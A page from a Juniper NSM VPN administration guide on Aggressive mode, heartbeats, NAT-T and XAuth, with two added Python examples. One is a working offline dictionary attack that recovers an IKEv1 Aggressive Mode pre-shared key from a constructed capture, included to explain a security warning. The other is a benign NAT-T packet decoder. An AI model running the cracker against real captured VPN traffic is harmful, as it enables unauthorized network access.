Juniper NETWORK AND SECURITY MANAGER 2010.4 - ADMINISTRATION GUIDE REV1 Administration Manual page 627

Copyright © 2010, Juniper Networks, Inc.
Aggressive mode completes Phase 1 in three messages instead of the six that Main mode uses, so it is typically faster, but it is less secure: the peer identities travel in the clear and, with pre-shared key authentication, so does the responder's authentication hash, which lets a passive observer run an offline dictionary attack against the key. Use Aggressive mode only when speed matters more than that exposure, and pair it with a long, random pre-shared key or with certificate authentication.
For RAS VPNs, you must use Aggressive mode, because the gateway needs the remote user's identity (which only Aggressive mode delivers in the first exchange) to select the correct pre-shared key for a peer at a dynamic address; for VPNs that do not include RAS users, select the mode that meets your requirements.
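The following Python example, added here and not part of the Juniper guide, shows why the "less secure" remark above matters. It implements the RFC 2409 section 5 formulas for SKEYID and HASH_R under pre-shared key authentication and runs an offline dictionary attack against a responder hash. Every captured field (nonces, Diffie-Hellman public values, cookies, SA body, identity) is constructed inline for the example; in a real Aggressive mode exchange all of them are sent unencrypted in the first two messages, which is exactly what makes the attack possible. The hash algorithm (SHA-1) and the pre-shared key are assumptions of the example.

```python
"""Offline dictionary attack on an IKEv1 Aggressive Mode pre-shared key.

In Aggressive Mode the responder's HASH_R (RFC 2409 section 5) and every value
that feeds it travel in the clear in the second message, so a passive observer
can test pre-shared-key guesses offline. In Main Mode the hashes and identities
are sent only after the exchange is encrypted, so the same attack needs an
active man-in-the-middle. All packet fields below are constructed for this
example; nothing is captured from a real peer.
"""
import hashlib
import hmac
from typing import Dict, Iterable, Optional


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes, hash_name: str = "sha1") -> bytes:
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b)  (RFC 2409 section 5, PSK auth)."""
    return hmac.new(psk, ni_b + nr_b, hash_name).digest()


def hash_r(psk: bytes, capture: Dict[str, bytes], hash_name: str = "sha1") -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    skeyid = skeyid_psk(psk, capture["ni_b"], capture["nr_b"], hash_name)
    msg = (capture["g_xr"] + capture["g_xi"] + capture["cky_r"] + capture["cky_i"]
           + capture["sai_b"] + capture["idir_b"])
    return hmac.new(skeyid, msg, hash_name).digest()


def _fake_field(label: str, length: int) -> bytes:
    """Deterministic stand-in for a value an attacker would read from the capture."""
    out = b""
    while len(out) < length:
        out += hashlib.sha256(label.encode() + len(out).to_bytes(2, "big")).digest()
    return out[:length]


def make_capture(true_psk: bytes) -> Dict[str, bytes]:
    """Constructed Aggressive Mode exchange: everything here is sent in the clear."""
    capture = {
        "g_xi": _fake_field("initiator DH public", 128),   # DH group 2, 1024-bit value
        "g_xr": _fake_field("responder DH public", 128),
        "ni_b": _fake_field("initiator nonce", 20),
        "nr_b": _fake_field("responder nonce", 20),
        "cky_i": _fake_field("initiator cookie", 8),
        "cky_r": _fake_field("responder cookie", 8),
        "sai_b": _fake_field("SA payload body", 52),
        # ID payload body: ID_FQDN (2), protocol UDP (17), port 500, then the name
        "idir_b": b"\x02\x11\x01\xf4" + b"vpn.example.net",
    }
    capture["hash_r"] = hash_r(true_psk, capture)  # what the responder really sends
    return capture


def crack_psk(capture: Dict[str, bytes], wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack: two HMACs per candidate, no network traffic at all."""
    for candidate in wordlist:
        if hmac.compare_digest(hash_r(candidate, capture), capture["hash_r"]):
            return candidate
    return None


if __name__ == "__main__":
    cap = make_capture(b"juniper123")  # assumed weak key for the demonstration
    print(crack_psk(cap, [b"password", b"Summer2010", b"juniper123"]))
```

The cost of the attack is two HMAC computations per guess, so a pre-shared key that is a dictionary word or a short phrase falls quickly; a key with 128 or more bits of entropy, or certificate authentication, removes the exposure.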
Configuring Heartbeats
Use heartbeats to detect a failed peer gateway so that traffic can fail over to a redundant gateway. Each security device sends periodic hello pulses to its peer and declares the tunnel down when enough consecutive pulses go unanswered.
Hello—Enter the number of seconds the security devices wait between sending hello pulses.
Reconnect—Enter the number of seconds the security device waits, after it has declared the peer unreachable, before it attempts to re-establish the tunnel.
Threshold—Enter the number of consecutive unanswered hello pulses after which the security device declares the peer unreachable. The peer is therefore deemed down roughly Hello times Threshold seconds after it stops responding.
Configuring NAT Traversal
Because a NAT device rewrites the IP addresses (and, for port translation, the port numbers) in packets that pass through it, AH integrity checks fail and ESP packets, which carry no port numbers, cannot be mapped back to individual hosts behind the NAT device. To enable VPN traffic to traverse a NAT device, you can use NAT Traversal (NAT-T) to encapsulate the ESP packets in UDP (port 4500, as standardized in RFC 3947 and RFC 3948). If a VPN node with NAT-T enabled detects an external NAT device during IKE negotiation, it applies the UDP encapsulation to every VPN packet sent through that tunnel.
Because the per-packet encapsulation impacts VPN performance, you should only use NAT Traversal for remote users who must connect to the VPN through an external NAT device. You do not need to enable NAT-T for internal security device nodes that perform NAT themselves; each such VPN node knows the correct address translations for VPN traffic and does not need to encapsulate it.
To use NAT-T, enable NAT-Traversal and specify:
UDP Checksum—The 2-byte value in the UDP header, calculated over the IP pseudo-header, the UDP header, and the UDP payload (UDP has no footer), that lets the receiver detect a corrupted datagram. Because ESP carries its own integrity check, RFC 3948 allows a NAT-T sender to transmit a zero (absent) checksum on UDP-encapsulated ESP, and most NAT devices (including security devices) accept that. You must enable this option only for NAT devices that drop UDP datagrams without a valid checksum.
Keep alive Frequency—The number of seconds a VPN node waits between sending NAT keepalive packets (a UDP datagram carrying the single byte 0xFF) through the NAT device. A NAT device keeps a translation entry active only while traffic flows through it and discards idle entries, so a quiet tunnel would lose its mapping and inbound VPN traffic would be dropped. To ensure that the VPN tunnel remains reachable, configure the VPN node to send keepalive packets at an interval shorter than the NAT device's UDP idle timeout.
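The Python example below, added here and not taken from the Juniper guide, decodes what actually arrives on UDP port 4500 once NAT-T is in use and shows what the UDP Checksum option controls. It classifies a datagram as a NAT keepalive, an IKE message, or UDP-encapsulated ESP according to RFC 3948, and it computes and verifies the IPv4 UDP checksum (RFC 768), distinguishing an absent (zero) checksum from a wrong one. The sample datagrams and addresses are constructed for the example; a real capture would supply them.

```python
"""Decode NAT-T datagrams on UDP/4500 and check their UDP checksums.

RFC 3948 multiplexes three things on the NAT-T port: a one-byte 0xFF NAT
keepalive, IKE messages prefixed with a four-zero-byte Non-ESP Marker, and
UDP-encapsulated ESP (whose SPI comes first and is never zero). The sample
datagrams below are constructed for this example.
"""
import struct
from typing import Dict

NAT_KEEPALIVE = b"\xff"                 # RFC 3948 section 2.3
NON_ESP_MARKER = b"\x00\x00\x00\x00"    # RFC 3948 section 2.2
IKEV1_EXCHANGE = {2: "main", 4: "aggressive", 5: "informational", 32: "quick"}


def classify_nat_t_payload(payload: bytes) -> Dict[str, object]:
    """Return the kind of NAT-T datagram plus the fields useful for triage."""
    if payload == NAT_KEEPALIVE:
        return {"kind": "nat-keepalive"}
    if payload.startswith(NON_ESP_MARKER):
        ike = payload[len(NON_ESP_MARKER):]
        if len(ike) < 28:                # the ISAKMP header is 28 bytes
            return {"kind": "malformed", "reason": "short ISAKMP header"}
        _ispi, rspi, _np, version, exch, flags, _mid, length = struct.unpack("!QQBBBBII", ike[:28])
        return {"kind": "ike", "major": version >> 4,
                "exchange": IKEV1_EXCHANGE.get(exch, str(exch)),
                "encrypted": bool(flags & 0x01), "length": length, "rspi_set": rspi != 0}
    if len(payload) >= 8:                # ESP: SPI, sequence number, then ciphertext
        spi, seq = struct.unpack("!II", payload[:8])
        return {"kind": "udp-esp", "spi": spi, "seq": seq}
    return {"kind": "malformed", "reason": "too short for ESP"}


def _ones_complement_sum(data: bytes) -> int:
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                   # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return total


def udp_checksum(src_ip: bytes, dst_ip: bytes, src_port: int, dst_port: int, payload: bytes) -> int:
    """IPv4 UDP checksum (RFC 768): pseudo-header + UDP header (checksum 0) + payload."""
    length = 8 + len(payload)
    pseudo = src_ip + dst_ip + b"\x00\x11" + struct.pack("!H", length)   # 0x11 = UDP
    header = struct.pack("!HHHH", src_port, dst_port, length, 0)
    csum = (~_ones_complement_sum(pseudo + header + payload)) & 0xFFFF
    return csum or 0xFFFF                # a computed 0 is sent as 0xFFFF; 0 on the wire means "absent"


def build_udp(src_ip: bytes, dst_ip: bytes, src_port: int, dst_port: int,
              payload: bytes, with_checksum: bool = True) -> bytes:
    """UDP segment; with_checksum=False sends the zero checksum RFC 3948 permits for NAT-T."""
    csum = udp_checksum(src_ip, dst_ip, src_port, dst_port, payload) if with_checksum else 0
    return struct.pack("!HHHH", src_port, dst_port, 8 + len(payload), csum) + payload


def verify_udp_checksum(src_ip: bytes, dst_ip: bytes, segment: bytes) -> str:
    """'absent' (zero checksum, legal for IPv4), 'ok', or 'bad'."""
    src_port, dst_port, length, received = struct.unpack("!HHHH", segment[:8])
    if received == 0:
        return "absent"
    expected = udp_checksum(src_ip, dst_ip, src_port, dst_port, segment[8:length])
    return "ok" if expected == received else "bad"


# Constructed sample traffic (addresses from the RFC 5737 documentation ranges).
SRC_IP, DST_IP = bytes([203, 0, 113, 10]), bytes([198, 51, 100, 2])
SAMPLE_PAYLOADS = {
    "keepalive": NAT_KEEPALIVE,
    # IKEv1 header: initiator SPI, responder SPI 0, next payload SA(1), version 1.0,
    # exchange type 4 (Aggressive), flags 0, message ID 0, length 28 (header only)
    "ike_aggressive": NON_ESP_MARKER + struct.pack("!QQBBBBII", 0x1122334455667788, 0, 1, 0x10, 4, 0, 0, 28),
    "esp": struct.pack("!II", 0xC0DE1234, 7) + bytes(range(16)),
}

if __name__ == "__main__":
    for name, payload in SAMPLE_PAYLOADS.items():
        print(name, classify_nat_t_payload(payload))
    seg = build_udp(SRC_IP, DST_IP, 4500, 4500, SAMPLE_PAYLOADS["esp"])
    print("checksum:", verify_udp_checksum(SRC_IP, DST_IP, seg))
```

A NAT device that insists on checksum verification will drop the segments that build_udp produces with with_checksum=False; that is the case the UDP Checksum option exists for. The classifier is also useful when a tunnel stalls: seeing keepalives but no udp-esp traffic in a capture tells you the NAT mapping is alive and the problem lies elsewhere.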
Configuring XAuth
Use the XAuth protocol to authenticate RAS users after Phase 1 completes, with a username and password or an authentication token (such as RSA SecurID), and to assign TCP/IP settings (IP address, DNS server, and WINS server) to the remote client that connects to the peer gateway.
Chapter 12: Configuring VPNs
577